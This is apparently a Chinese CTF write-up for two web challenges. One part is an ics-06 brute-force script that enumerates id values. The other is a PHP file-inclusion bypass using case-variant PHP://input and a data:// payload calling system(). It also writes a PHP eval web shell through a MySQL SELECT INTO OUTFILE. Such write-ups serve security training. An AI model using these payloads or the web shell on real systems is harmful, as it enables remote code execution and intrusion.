|
ics-06:
提示报表中心有东西,那就进报表中心
?id=1 送分题,硬跑就完事了
kali自带的社区版burpsuite是在不敢恭维,自己写个脚本跑吧
import requests
url='http://111.200.241.244:54758/index.php?id=1'
r=requests.session()
response=requests.get(url)
print(len(response.text))
for i in range(1,10000):
url = 'http://111.200.241.244:54758/index.php?id='+str(i)
response1=r.get(url)
print(len(response1.text))
if len(response1.text)!=1653:
print(i)
print(response1.text)
break
WEB_php_include:
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
$page=str_replace("php://", "", $page);
}
include($page);
?>
源码分析,过strstr和str_replace函数,这两个函数都严格区分大小写
1.PHP://input,这是个很危险的伪协议,他会把带过去的内容当作代码处理
2.data伪协议绕过?page=data://text/plain,<?php system("cat fl4gisisish3r3.php"); ?>,输出被做了处理,在源码里
3.既然能执行system权限,而且扫目录,扫除了phpmyadmin,尝试弱口令登录数据库,居然没密码,尝试数据库写入shell
SHOW VARIABLES LIKE “secure_file_priv”//这个参数是mysql能否读取写入文件,空表示可以
SELECT “<?php eval(@$_POST['xiaohua']); ?>” INTO OUTFILE ‘/tmp/test1.php’,菜刀连接即可
参考视频链接:
https://www.bilibili.com/video/BV1UM4y1N7gN/
https://www.bilibili.com/video/BV1A54y1772U/
|